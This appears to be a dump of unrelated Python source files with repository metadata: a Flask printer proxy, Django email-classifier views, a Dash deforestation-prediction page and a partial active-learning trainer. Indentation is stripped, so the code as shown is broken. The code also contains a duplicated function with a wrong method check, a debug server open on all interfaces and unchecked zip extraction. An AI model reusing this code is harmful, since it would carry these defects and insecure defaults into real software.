return jsonify(message="Success!", code=200)
except:
return jsonify(message="Error!", code=500)
@app.route('/cut/<addr>', methods=['GET'])
def print_cut(addr):
return cut(addr=addr, request=request)
def cut(printer=False, addr=False, request=False):
if printer:
return printer.cut()
data, printer, message = setup_for_command(request, addr)
printer.cut()
return jsonify(message="Success!", code=200)
def setup_for_post_command(request, addr, data_type="txt"):
if request.method != 'POST':
return False, False, jsonify(message="This should be used with POST method.", code=405)
return setup_for_command(request, addr, data_type)
def setup_for_post_command(request, addr, data_type="txt"):
if request.method != 'GET':
return False, False, jsonify(message="This should be used with GET method.", code=405)
return setup_for_command(request, addr, data_type)
def setup_for_command(request, addr, data_type="txt"):
if not validate_address(addr):
return False, False, jsonify(message="Not a valid url or ip address.", code=406)
data = get_data(request.data, data_type)
printer = create_network(addr)
if not printer:
return False, False, jsonify(message="Error ocurred", code=504)
app.logger.info(data or "no data")
if printer and not data:
try:
printer.cut()
except:
return False, False, jsonify(message="No connection could be made to the address.", code=406)
return False, False, jsonify(message="Printer found on ip: %s" % addr, code=202)
return data, printer, False
def get_data(data, data_type):
try:
if data_type == "txt":
return str(data.decode('utf-8'))
app.logger.info(data)
imgdata = base64.b64decode(data)
dir_path = os.path.dirname(os.path.realpath(__file__))
filename = dir_path + "/temp_receipt.jpg"
with open(filename, 'wb') as f:
app.logger.info(filename)
f.write(imgdata)
return filename
except:
return False
def create_network(addr):
try:
printer = Network(addr)
return printer
except TimeoutError:
return False
def validate_address(addr):
regex = re.compile(
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'localhost|' #localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
return re.match(regex, addr)
if __name__ == '__main__':
app.run(debug=True, host="0.0.0.0") | Christophersuazop/printer_proxy | main.py | main.py | py | 3,827 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "flask.request",
"line_number": 15,
"usage_type": "argument"
},
{
"api_name": "flask.jsonify",
"lin... |
71504143463 | from django.shortcuts import render
from django.http import HttpResponse
from zipfile import ZipFile, is_zipfile, Path
import os
from outlook_msg import Message
import pandas as pd
import numpy as np
import re
import nltk
import spacy
from string import punctuation
import extract_msg
nltk.download('punkt')
from nltk.tokenize import word_tokenize
# NLTK stopwords modules
nltk.download('stopwords')
from nltk.corpus import stopwords
# NLTK lemmatization modules
nltk.download('wordnet')
from nltk.stem import WordNetLemmatizer
import io
import matplotlib.pyplot as plt
import sklearn
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
import pickle
import numpy as np
import pandas as pd
from keras import backend as K
from keras.layers.experimental.preprocessing import TextVectorization
from keras.preprocessing.text import one_hot,Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Reshape,RepeatVector,LSTM,Dense,Flatten,Bidirectional,Embedding,Input,Layer,GRU,Multiply,Activation,Lambda,Dot,TimeDistributed,Dropout,Embedding
from keras.models import Model
from keras.activations import softmax,selu,sigmoid
from keras.optimizers import Adam
from keras.initializers import glorot_uniform
from keras.regularizers import l2
from keras.constraints import min_max_norm
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import plot_model
import tensorflow as tf
import os
import gensim
from tqdm import tqdm
import keras
from .attention_with_context import *
from .sentence_encoder import *
from .word_encoder import *
########### GLOBALS ##################################
tfidf = None
category_filename = "category.pkl"
test_filelist_filename = "test_filenames.pkl"
tfidf_file = 'tfidf_file.pkl'
########## VIEWS ##################################
# Create your views here.
def index1(request):
# trained = True
# new_model = keras.models.load_model('model_and_weights.h5',custom_objects={'word_encoder': word_encoder})
#
# try:
# pass
# except:
# trained = False
# finally:
if request.method == 'GET':
return render(request, 'home.html', {'train_success': False})
if request.method == 'POST':
return render(request, 'home.html', {'train_success': False})
def submit_data(request):
if request.method == 'GET':
return HttpResponse("<h1>FORBIDDEN!</h1> <h2>This Page Cannot Be Accessed Directly.</h2>")
elif request.method == 'POST':
print("For debug")
print(request.FILES)
file = request.FILES['train']
if is_zipfile(file) is False:
return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload A Zip File Containing The DataSet</h2>")
# Stores the categories obtained
cats = []
# Extract the files to a new directory named by the input folder name
file_path = ""
with ZipFile(file,'r') as myzip:
path = Path(myzip)
# print(path.name)
for dir in path.iterdir():
cats.append(dir.name)
file_path = os.getcwd() + os.path.sep + myzip.filename.split('.')[0]
print(file_path)
myzip.extractall(path=file_path)
# save the category file to disk, so that can be retrieved while testing
open_file = open(category_filename,'wb')
pickle.dump(cats,open_file)
open_file.close()
# Now the Zip file has been extracted to the working directory and file_path is the absolute path of the folder
data = []
for cat in cats:
sub_path = file_path + os.path.sep + cat
for root,directories,files in os.walk(sub_path):
for file in files:
abs_path = os.path.join(root,file)
# with extract_msg.Message(abs_path) as msg:
with open(abs_path) as msg_file:
msg = Message(msg_file)
sub = "\""+msg.subject+"\""
body = "\""+msg.body+"\""
temp = [cat, sub, body]
data.append(temp)
df = pd.DataFrame(data,columns=['Category', 'Subject', 'Body'])
csv_path = file_path+'.csv'
df.to_csv(csv_path, index=False, header=True)
preprocess(csv_path=csv_path)
with open(csv_path, 'rb') as fh:
response = HttpResponse(fh.read(), content_type="text/csv")
response['Content-Disposition'] = 'inline; filename=' + os.path.basename(csv_path)
return response
return HttpResponse("DONE")
def index2(request):
trained = True
try:
f = open('Train_AI_Model','rb')
except:
trained = False
finally:
if request.method == 'GET':
return render(request,'home2.html', {'train_success': trained})
if request.method == 'POST':
return render(request,'home2.html', {'train_success': trained})
##### FUNCTION TO PREPROCESS DATA #############################
def remove_emails_urls(dataframe):
no_emails = re.sub(r'\S*@\S*\s?','',str(dataframe))
no_url = re.sub(r"http\S+",'',no_emails)
return no_url
def remove_dates(dataframe):
# DD/MM/YYYY or MM/DD/YYYY or DD|MM.MM|DD.YYYY format
dataframe = re.sub(r'(\b(0?[1-9]|[12]\d|30|31)[^\w\d\r\n:](0?[1-9]|1[0-2])[^\w\d\r\n:](\d{4}|\d{2})\b)|(\b(0?[1-9]|1[0-2])[^\w\d\r\n:](0?[1-9]|[12]\d|30|31)[^\w\d\r\n:](\d{4}|\d{2})\b)','',dataframe)
# October 21, 2014 format
dataframe = re.sub(r'\b(?:jan(?:uary)?|feb(?:ruary)?|mar(?:ch)?|apr(?:il)?|may|jun(?:e)?|jul(?:y)?|aug(?:ust)?|sep(?:tember)?|oct(?:ober)?|(nov|dec)(?:ember)?)(?=\D|$)','',dataframe)
# mon|monday format
dataframe = re.sub(r'\b((mon|tues|wed(nes)?|thur(s)?|fri|sat(ur)?|sun)(day)?)\b','',dataframe)
return dataframe
def remove_useless(dataframe):
#for body removal words
dataframe = re.sub('from:','',dataframe)
dataframe = re.sub('sent:','',dataframe)
dataframe = re.sub('to:','',dataframe)
dataframe = re.sub('cc:','',dataframe)
dataframe = re.sub('bcc:','',dataframe)
dataframe = re.sub('subject:','',dataframe)
dataframe = re.sub('message encrypted','',dataframe)
dataframe = re.sub('warning:','',dataframe)
#for subject removal words
dataframe = re.sub('fw:','',dataframe)
dataframe = re.sub('re:','',dataframe)
return dataframe
def remove_punctuation(text):
#function to remove the punctuation
return re.sub('[^\w\s]','',text)
def remove_no(text):
return re.sub(r"\d+",'',text)
def remove_of_words(text):
text = re.sub(r"\b_([a-zA-z]+)_\b",r"\1",text) #replace _word_ to word
text = re.sub(r"\b_([a-zA-z]+)\b",r"\1",text) #replace _word to word
text = re.sub(r"\b([a-zA-z]+)_\b",r"\1",text) #replace word_ to word
text = re.sub(r"\b([a-zA-Z]+)_([a-zA-Z]+)\b",r"\1 \2", text) #replace word1_word2 to word1 word2
return text
def remove_less_two(text):
return re.sub(r'\b\w{1,3}\b',"",text) #remove words <3
def remove_char(dataframe):
result = re.sub(r"\s+",' ',dataframe)
result = re.sub(r"^\s+|\s+$","",result)
result = re.sub(r"\b____________________________\b",'',result)
return result
def remove_stopwords(text):
all_stop_words = stopwords.words('english')
greet_sw = ['hello', 'good', 'morning', 'evening', 'afternoon', 'respected', 'dear', 'madam', 'sincerely',
'regards', 'truly']
all_stop_words.extend(greet_sw)
"""custom function to remove the stopwords"""
tokens = word_tokenize(text)
token_wsw = [w for w in tokens if w not in all_stop_words]
filter_str = ' '.join(token_wsw)
return filter_str
def lemmatized(text):
lemmatizer = nltk.stem.WordNetLemmatizer()
tokens = word_tokenize(text)
lemma = [lemmatizer.lemmatize(word) for word in tokens]
filter_str = ' '.join(lemma)
return filter_str
def preprocess(csv_path,test=False):
"""**Upload the Data**"""
df = pd.read_csv(csv_path)
"""**Lower Text Case**"""
df[['Subject', 'Body']] = df[['Subject', 'Body']].apply(lambda x: x.str.lower())
"""**Removing Emails and URLs -** Patterns: ```regexp(r'[\w\.*]+@[\w\.*]+\b'); regexp(r'\S*@\S*\s?')```"""
df['Subject'] = df['Subject'].apply(remove_emails_urls)
df['Body'] = df['Body'].apply(remove_emails_urls)
"""**Removing Dates**"""
df['Subject'] = df['Subject'].apply(remove_dates)
df['Body'] = df['Body'].apply(remove_dates)
"""**Removing Useless Words -** ```['from:','sent:','to:','message encrypted','warning:','subject:','fw:','re:','cc:','bcc:']```"""
df['Body'] = df['Body'].apply(remove_useless)
df['Subject'] = df['Subject'].apply(remove_useless)
"""**Removing of Punctuations -** `!"#$%&\'()*+,-./:;<=>?@[\\]^_{|}~` """
df['Subject'] = df['Subject'].apply(remove_punctuation)
df['Body'] = df['Body'].apply(remove_punctuation)
"""**Removing Numbers**"""
df['Subject'] = df['Subject'].apply(remove_no)
df['Body'] = df['Body'].apply(remove_no)
"""**Replacing “_word_” , “_word” , “word_” kinds to word**"""
df['Subject'] = df['Subject'].apply(remove_of_words)
df['Body'] = df['Body'].apply(remove_of_words)
"""**Removing the Short Characters (<3 words)**"""
df['Subject'] = df['Subject'].apply(remove_less_two)
df['Body'] = df['Body'].apply(remove_less_two)
"""**Removing Special Characters (\n,\r...)**"""
df['Subject'] = df['Subject'].apply(remove_char)
df['Body'] = df['Body'].apply(remove_char)
"""### **NLP Based Preprocessing**
**Removing Stopwords**
"""
df['Subject'] = df['Subject'].apply(remove_stopwords)
df['Body'] = df['Body'].apply(remove_stopwords)
"""**Lemmatization** """
df['Lemma Subject'] = df['Subject'].apply(lemmatized)
df['Lemma Body'] = df['Body'].apply(lemmatized)
"""**Saving of Preprocessed Data**"""
if test:
df.to_csv('Pre_Test.csv', index=False)
else:
df.to_csv('Pre_Train.csv', index=False)
############ MACHINE LEARNING TRAINING FUNCTION #######################################
def trainml(request):
try:
data = pd.read_csv("Pre_Train.csv", encoding='utf-8')
except:
return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload the Train Dataset first</h2>")
else:
# data['Category_Id'] = data['Category'].factorize()[0]
#
# data['Lemma Message'] = data['Lemma Subject'].astype(str) + " " + data['Lemma Body'].astype(str)
df = data[['Category_id', 'LemmaConcatenated']]
category_id_df = data[['Category', 'Category_id']].drop_duplicates().sort_values('Category_id')
"""**Text Vectorization**"""
global tfidf
tfidf = TfidfVectorizer(sublinear_tf=True, min_df=5, norm='l2', encoding='latin-1', ngram_range=(1, 2),
stop_words='english')
features = tfidf.fit_transform(df['LemmaConcatenated']).toarray()
# save the tfidf model
open_file = open(tfidf_file,'wb')
pickle.dump(tfidf,open_file)
open_file.close()
# continue with everything
labels = df.Category_id
"""**Train the Model**"""
model = RandomForestClassifier(random_state=0, n_estimators=200, min_samples_split=2, min_samples_leaf=1,
max_features='auto', max_depth=105, bootstrap='False')
# Split the Data
X_train = features
y_train = labels
# Train the Algorithm
train_model = model.fit(X_train, y_train)
"""**Save the Model**"""
pickle.dump(train_model, open('Train_AI_Model', 'wb'))
return render(request, 'home2.html', {'train_success' : True})
#################################################################### DEEP LEARNING TRAIN FUNCTION #######################################
def dot_product(x, kernel):
"""
Wrapper for dot product operation, in order to be compatible with both
Theano and Tensorflow
Args:
x (): input
kernel (): weights
Returns:
"""
if K.backend() == 'tensorflow':
return K.squeeze(K.dot(x, K.expand_dims(kernel)), axis=-1)
else:
return K.dot(x, kernel)
def emb_loss(model, X, Y, training):
# training=training is needed only if there are layers with different
# behavior during training versus inference (e.g. Dropout).
Y_tilde = model(X, training=training)
a = tf.keras.losses.CategoricalCrossentropy()
E_loss_T0 = a(Y, Y_tilde)
return E_loss_T0
def grad_emb(model, inputs, targets):
with tf.GradientTape() as tape:
loss_value = emb_loss(model, inputs,targets, training=True)
return loss_value, tape.gradient(loss_value, model.trainable_variables)
def traindl(request):
try:
df = pd.read_csv('Pre_Train.csv')
except:
return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To First Upload The Train DataSet</h2>")
else:
df = df.sample(frac=1)
"""**Applying the Categories to Numbers**"""
df2 = pd.get_dummies(df['Category'])
# Voabulary and number of words
vocab = 10000
sequence_length = 40
df1 = df[['Lemma Body']]
"""**Converting to Numpy Array**"""
# Prepare Tokenizer
t = Tokenizer()
words = list(df1['Lemma Body'])
t.fit_on_texts(words)
vocab_size = len(t.word_index) + 1
# integer encode the documents
encoded_docs = t.texts_to_sequences(words)
# pad documents to a max length of 40 words
padded_docs = pad_sequences(encoded_docs, maxlen=sequence_length, padding='post')
# Preparing the labels into arrays
labels = df2.to_numpy()
"""**Reshape to (Documents X Sentences X Words)**"""
a = tf.reshape(padded_docs, (297, 4, 10))
x_train = a[:]
y_train = labels[:]
index_dloc = 'word_embeddings/glove_6B_300d.txt'
"""Here we create a dictionary named embedding vector, which will have keys, defined as words, present in the glove embedding file and the value of that key will be the embedding present in the file. This dictionary will contain all the words available in the glove embedding file."""
embedding_index = dict()
f = open(index_dloc)
for line in tqdm(f):
value = line.split(' ')
word = value[0]
coef = np.array(value[1:], dtype='float32')
embedding_index[word] = coef
f.close()
# create a weight matrix for words in training docs
embedding_matrix = np.zeros((vocab_size, 300))
for word, i in t.word_index.items():
embedding_vector = embedding_index.get(word)
if embedding_vector is not None:
embedding_matrix[i] = embedding_vector
words = 10
sentences = 4
document = 16
units = 64
# Shape of Input = (No of document, No of Sentences, No of Words)
input = Input(batch_input_shape=(document, sentences, words))
# Word Encoder
# Reshape into (No of Documents * No of Sentences, No of Words)
# Embedding layer Output Shape = (No of Documents * No of Sentences, No of Words, Embedding Dimension)
a1 = word_encoder(lstm_units=128, dense_units=64, emb=300, document=document, sentences=sentences, words=words,
embeddings=embedding_matrix)(input)
a2 = AttentionWithContext()(a1)
# Sentence Encoder
a3 = sentence_encoder(lstm_units=128, dense_units=64, document=document, sentences=sentences, units=units)(a2)
a4 = AttentionWithContext()(a3)
a5 = Dropout(0.2)(a4)
# Document Classification
output = Dense(3, activation='softmax')(a5)
model = Model(input, output)
# print('Start Network Training')
# Instantiate an optimizer
adam = Adam(learning_rate=0.000099, beta_1=0.9, beta_2=0.999, amsgrad=False)
# keep results for plotting
train_loss_results = []
for epoch in range(15):
epoch_loss_avg = tf.keras.metrics.CategoricalAccuracy()
# Training Loop, using the batches of 16
for i in range(0, 13):
x = x_train[i * 16:(i + 1) * 16]
y = y_train[i * 16:(i + 1) * 16]
# Optimize the model
loss_value, grads = grad_emb(model, x, y)
adam.apply_gradients(zip(grads, model.trainable_variables))
# Track progress
epoch_loss_avg.update_state(y, model(x)) # Add current batch loss
# Compare predicted label to actual label
# End epoch
train_loss_results.append(epoch_loss_avg.result())
# print("Epoch {:03d}: Loss: {:.3f}".format(epoch, epoch_loss_avg.result()))
# print('Finish Network Training')
model.save('model_and_weights')
return render(request, 'home.html',{'train_succes':True})
############################################################# SUBMIT TEST DATASET FUNCTION ###################################
def submit_test(request):
if request.method == 'GET':
return HttpResponse("<h1>FORBIDDEN!</h1> <h2>This Page Cannot Be Accessed Directly.</h2>")
elif request.method == 'POST':
# print("For debug")
# print(request.FILES)
file = request.FILES['test']
if is_zipfile(file) is False:
return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload A Zip File Containing The DataSet</h2>")
# Stores the categories obtained
cats = []
# Extract the files to a new directory named by the input folder name
file_path = ""
with ZipFile(file,'r') as myzip:
path = Path(myzip)
# print(path.name)
for dir in path.iterdir():
cats.append(dir.name)
file_path = os.getcwd() + os.path.sep + myzip.filename.split('.')[0]
print(file_path)
myzip.extractall(path=file_path)
# Now the Zip file has been extracted to the working directory and file_path is the absolute path of the folder
data = []
file_list = []
for cat in cats:
sub_path = file_path + os.path.sep + cat
for root,directories,files in os.walk(sub_path):
for file in files:
abs_path = os.path.join(root,file)
# with extract_msg.Message(abs_path) as msg:
with open(abs_path) as msg_file:
msg = Message(msg_file)
sub = "\""+msg.subject+"\""
body = "\""+msg.body+"\""
temp = [sub, body]
data.append(temp)
file_list.append(file)
# save the names of files for later use in classifying
open_file = open(test_filelist_filename, 'wb')
pickle.dump(file_list,open_file)
open_file.close()
# Create the dataframe
df = pd.DataFrame(data,columns=['Subject', 'Body'])
csv_path = file_path+'.csv'
df.to_csv(csv_path, index=False, header=True)
preprocess(csv_path=csv_path,test=True)
with open(csv_path, 'rb') as fh:
response = HttpResponse(fh.read(), content_type="text/csv")
response['Content-Disposition'] = 'inline; filename=' + os.path.basename(csv_path)
return response
return HttpResponse("DONE")
############################################################# ML TEST DATASET FUNCTION ###################################
def testml(request):
try:
data = pd.read_csv("Pre_Test.csv", encoding='utf-8')
data['Lemma Message'] = data['Lemma Subject'].astype(str) + " " + data['Lemma Body'].astype(str)
df = data[['Lemma Message']]
# retreve the tfidf model from disk
open_file = open(tfidf_file,'rb')
tfidf = pickle.load(open_file)
open_file.close()
# generate X_test
X_test = tfidf.transform(df['Lemma Message']).toarray()
model = pickle.load(open('Train_AI_Model', 'rb'))
# y_pred_proba = model.predict_proba(X_test)
y_pred = model.predict(X_test)
# Now y_pred contains numbers in ranges 0..number of categories
# retrieve the categories names
open_file = open(category_filename, 'rb')
cats = pickle.load(open_file)
open_file.close()
# Next retrieve the filenames from disk
open_file = open(test_filelist_filename, 'rb')
file_list = pickle.load(open_file)
open_file.close()
df_dat = []
for idx, f in enumerate(file_list):
temp = [f, cats[y_pred[idx]]]
df_dat.append(temp)
df = pd.DataFrame(df_dat, columns=['Filename', 'Category'])
df.to_csv('Test_Output.csv', index=False, header=True)
return render(request, 'home2.html', {'train_success': True ,'test_done': True, 'output': df_dat})
except:
return HttpResponse("<h1>FORBIDDEN!</h1> <h2>First upload the Test Dataset.</h2>")
############################################################# DL TEST DATASET FUNCTION ###################################
model = None
def testdl(request):
try:
df = pd.read_csv("Pre_Test.csv", encoding='utf-8')
except:
return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload A Zip File Containing The Test DataSet</h2>")
else:
df = df.sample(frac=1)
# Vocabulary and number of words
vocab = 10000
sequence_length = 40
word = 10
sentences = int(sequence_length / word)
document = 8 #####
units = 64
df1 = df[['Lemma Body']]
# Prepare Tokenizer
t = Tokenizer()
wors = list(df1['Lemma Body'])
t.fit_on_texts(wors) #
vocab_size = len(t.word_index) + 1
# integer encode the documents
encoded_docs = t.texts_to_sequences(wors)
# pad documents to a max length of 40 words
padded_docs = pad_sequences(encoded_docs, maxlen=sequence_length, padding='post')
"""**Reshape to (Documents X Sentences X Words)**"""
a = tf.reshape(padded_docs, (df.shape[0], int(sequence_length/10), 10))
x_test = a[:]
batch = document
global model
# try:
if model is None:
model = keras.models.load_model('model_name')
# except:
# return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Train The Model First</h2>")
# else:
result = np.zeros((1, 3))
# result = model.predict(a[:])
for i in range(0, int(x_test.shape[0] / batch)):
predictions = model.predict(x_test[batch * i:batch * (i + 1)])
result = np.vstack((result, predictions))
result = np.delete(result, (0), axis=0)
b = pd.DataFrame(result, columns=['MDU', 'Retirements', 'Transfers'])
b = pd.DataFrame(b.idxmax(axis=1), columns=['Predicted'])
open_file = open(category_filename, 'rb')
cats = pickle.load(open_file)
open_file.close()
# Next retrieve the filenames from disk
open_file = open(test_filelist_filename, 'rb')
file_list = pickle.load(open_file)
open_file.close()
df_dat = []
for idx, f in enumerate(file_list):
if idx >= int(b.shape[0]/batch)*batch:
break
temp = [f, b.iloc[idx][0]]
df_dat.append(temp)
df = pd.DataFrame(df_dat, columns=['Filename', 'Category'])
df.to_csv('Test_Output.csv', index=False, header=True)
return render(request, 'home.html', {'test_success': True, 'test_done': True, 'output': df_dat})
############################################################# DOWNLOAD TEST OUTPUT FUNCTION ##########################
def download(request):
try:
fh = open('Test_Output.csv', 'rb')
response = HttpResponse(fh.read(), content_type="text/csv")
response['Content-Disposition'] = 'inline; filename=Test_Output.csv'
return response
except:
return HttpResponse("<h1>FORBIDDEN!</h1> <h2>Train the model first.</h2>")
| TheThinker01/AiEmailClassifier | server/views.py | views.py | py | 24,603 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "nltk.download",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "nltk.download",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "nltk.download",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
... |
75216777705 | from joblib import load
pipeline1 = load('assets/xgb1.joblib')
pipeline2 = load('assets/xgb2.joblib')
# Imports from 3rd party libraries
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from xgboost import XGBRegressor
import pandas as pd
import numpy as np
import category_encoders as ce
import plotly.graph_objects as go
# Imports from this application
from app import app
## for chloropleth mapbox usage
mapboxt = open("./amazon/token.txt").read()
# style for controls
style = {'padding': '1.5em'}
# controls start here
layout = html.Div([
dcc.Markdown("""
### Predict
Use the controls below to update your predicted location, based on
area in km^2, day, month, year and state.
*(Predictions based on sample dataset using XGboost model. Check the [Process](https://amazon-deforestation.herokuapp.com/process) page why.)*
"""),
html.Div([
dcc.Markdown('###### Area in km^2'),
dcc.Slider(
id='area',
min=0.062,
max=1.440,
step=0.040,
value=0.090,
marks={n: f'{n:.2f}' for n in np.arange(0.006, 1.440, 0.040)}
),
], style=style),
html.Div([
dcc.Markdown('###### Day'),
dcc.Slider(
id='day',
min=1,
max=30,
step=1,
value=25,
marks={n: str(n) for n in range(1, 31, 1)}
),
], style=style),
html.Div([
dcc.Markdown('###### Month'),
dcc.Slider(
id='month',
min=1,
max=12,
step=1,
value=7,
marks={n: str(n) for n in range(1, 13, 1)}
),
], style=style),
html.Div([
dcc.Markdown('###### Year'),
dcc.Slider(
id='year',
min=2008,
max=2025,
step=1,
value=2017,
marks={n: str(n) for n in range(2008, 2025, 1)}
),
], style=style),
html.Div([
dcc.Markdown('###### State'),
dcc.Dropdown(
id='state',
options=[{'label': state, 'value': state} for state in ['Para', 'Mato Grosso', 'Rondonia', 'Amazonas','Maranhao', 'Acre', 'Roraima', 'Amapa', 'Tocantins']],
value='Para'
),
], style=style),
# Scatter mapbox plot with predictions
html.Div([
dcc.Graph(id='graph')
],
style=style)
])
# get the inputs
@app.callback(
# Output(component_id='prediction-content', component_property='children'),
Output(component_id='graph', component_property='figure'),
[Input(component_id='area', component_property='value'),
Input(component_id='day', component_property='value'),
Input(component_id='month', component_property='value'),
Input(component_id='year', component_property='value'),
Input(component_id='state', component_property='value')])
# apply model
def predict(area, day, month, year, state):
df = pd.DataFrame(
columns=['areakm_squared', 'day', 'month', 'year', 'states'],
data=[[area, day, month, year, state]])
y_pred_1 = pipeline1.predict(df)[0]
y_pred_2 = pipeline2.predict(df)[0]
# print(y_pred_1)
# print(y_pred_2)
results = [y_pred_1, y_pred_2]
graphing = {
'data': [{
'type': 'scattermapbox',
'lat': [results[0]],
'lon': [results[1]],
'name':'Predicted location of deforested area',
'showlegend': True,
'mode': 'markers',
'hoverinfo': 'all',
'text':f'predicted location latitude:{results[0]}, longitude:{results[1]}',
'marker':go.scattermapbox.Marker(
size=30,
color='#E51313',
opacity=0.8),
'hovertemplate': f'Predicted location: latitude:{results[0]:.4f}, longitude:{results[1]:.4f} with {area} km^2'
}],
'layout': go.Layout(title_text= f'Predictions for state <b>{state}</b><br> latitude:<b>{results[0]:.4f}</b>, longitude:<b>{results[1]:.4f}</b> with <b>{area}</b> km^2',
title_x=0.05, width =1000, height=660,
mapbox = dict(center= dict(lat=-5.977402, lon=-58.97948),
accesstoken= mapboxt,
pitch=0,
zoom=4,
style='light'
),
mapbox_style = "streets",
showlegend=True,
legend=dict(x=0.7, y=1.15))
}
return go.Figure(data=graphing['data'], layout=graphing['layout'])
| tigju/Amazon-Deforestation-Prediction-App | pages/predictions.py | predictions.py | py | 4,861 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "joblib.load",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "joblib.load",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "dash_html_components.Div",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "dash_core_components.M... |
31113872518 | """
The main script that serves as the entry-point for all kinds of training experiments.
"""
from __future__ import annotations
import logging
from functools import partial
from typing import TYPE_CHECKING, Any, Callable, Mapping, Optional, Sequence, Tuple, Union
import torch
from al.core.data.collators import JointBatchToTensorDataCollator
from al.core.models.vaal.xai_model import VAALXAIModel
from al.core.training.query_strategies.factory import QueryStrategyFactory
from al.core.training.trainer import DALTrainer
from ignite.contrib.handlers import TensorboardLogger
from torch import nn
from xai_torch.core.args import Arguments
from xai_torch.core.constants import DataKeys
from xai_torch.core.models.utilities.data_collators import BatchToTensorDataCollator
from xai_torch.core.models.xai_model import XAIModel
from xai_torch.core.training.utilities import reset_random_seeds
if TYPE_CHECKING:
from al.core.training.query_strategies.base import QueryStrategy
from xai_torch.core.args import Arguments
from xai_torch.core.data.data_modules.base import BaseDataModule
from al.core.data.active_learning_datamodule import ActiveLearningDataModule
from ignite.engine import Engine
from xai_torch.core.training.constants import TrainingStage
logging.basicConfig(level=logging.INFO)
class VAALTrainer(DALTrainer):
@classmethod
def configure_running_avg_logging(cls, args: Arguments, engine: Engine, stage: TrainingStage):
from ignite.metrics import RunningAverage
def output_transform(x: Any, index: int, name: str) -> Any:
import numbers
import torch
if isinstance(x, Mapping):
return x[name]
elif isinstance(x, Sequence):
return x[index]
elif isinstance(x, (torch.Tensor, numbers.Number)):
return x
else:
raise TypeError(
"Unhandled type of update_function's output. "
f"It should either mapping or sequence, but given {type(x)}"
)
# add loss as a running average metric
for i, n in enumerate([f"{step}_{DataKeys.LOSS}" for step in ["task", "vae", "dsc"]]):
RunningAverage(
alpha=0.5, output_transform=partial(output_transform, index=i, name=n), epoch_bound=False
).attach(engine, f"{stage}/{n}")
@classmethod
def setup_training_engine(cls, args, model, train_dataloader, val_dataloader, output_dir, tb_logger, device):
# setup training engine
training_engine = cls.initialize_training_engine(
args=args, model=model, train_dataloader=train_dataloader, device=device
)
validation_engine = None
if args.general_args.do_val:
# setup validation engine
validation_engine = cls.initialize_validation_engine(args=args, model=model, device=device)
# configure training and validation engines
cls.configure_training_engine(
args=args,
training_engine=training_engine,
model=model,
output_dir=output_dir,
tb_logger=tb_logger,
train_dataloader=train_dataloader,
validation_engine=validation_engine,
val_dataloader=val_dataloader,
)
# add training hooks from the model
model.add_training_hooks(training_engine)
return training_engine, validation_engine
@classmethod
def initialize_training_engine(
cls,
args: Arguments,
model: VAALXAIModel,
train_dataloader: DataLoader,
device: Optional[Union[str, torch.device]] = torch.device("cpu"),
scaler: Optional["torch.cuda.amp.GradScaler"] = None,
) -> Callable:
def cycle(iterable):
while True:
for i in iterable:
yield i
if args.training_args.gradient_accumulation_steps <= 0:
raise ValueError(
"Gradient_accumulation_steps must be strictly positive. "
"No gradient accumulation if the value set to one (default)."
)
from ignite.engine import Engine
# get related arguments
gradient_accumulation_steps = args.training_args.gradient_accumulation_steps
non_blocking = args.training_args.non_blocking_tensor_conv
train_datacycler = cycle(train_dataloader)
def update_model(engine, model, batch, step="task"):
from xai_torch.core.constants import DataKeys
# perform optimizers zero_grad() operation with gradient accumulation
if (engine.state.iteration - 1) % gradient_accumulation_steps == 0:
print(step, "zero grad")
model.optimizers[step].zero_grad()
# forward pass
model_output = model.torch_model.training_step(batch=batch, step=step)
# make sure we get a dict from the model
assert isinstance(model_output, dict), "Model must return an instance of dict."
# get loss from the output dict
loss = model_output[DataKeys.LOSS]
# accumulate loss if required
if gradient_accumulation_steps > 1:
loss = loss / gradient_accumulation_steps
# backward pass
loss.backward()
print(step, loss)
# perform optimizer update for correct gradient accumulation step
if engine.state.iteration % gradient_accumulation_steps == 0:
model.optimizers[step].step()
print(step, "step update")
# if on the go training evaluation is required, detach data from the graph
if args.training_args.eval_training and step == "task":
return_dict = {}
for key, value in model_output.items():
if key == DataKeys.LOSS:
return_dict[key] = value.item()
elif isinstance(value, torch.Tensor):
return_dict[key] = value.detach()
return return_dict
return {f"{step}_{DataKeys.LOSS}": model_output[DataKeys.LOSS].item()}
def training_step(engine: Engine, _) -> Union[Any, Tuple[torch.Tensor]]:
"""
Define the model training update step
"""
from ignite.utils import convert_tensor
# setup model for training
model.torch_model.train()
# get batch from dataloader
batch = next(train_datacycler)
# put batch to device
batch = convert_tensor(batch, device=device, non_blocking=non_blocking)
# call task model update
task_output = update_model(engine, model, batch, step="task")
# call the vae update
for count in range(args.al_args.training_args.num_vae_steps):
vae_output = update_model(engine, model, batch, step="vae")
# sample new batch if needed to train the adversarial network
if count < (args.al_args.training_args.num_vae_steps - 1):
batch = next(train_datacycler)
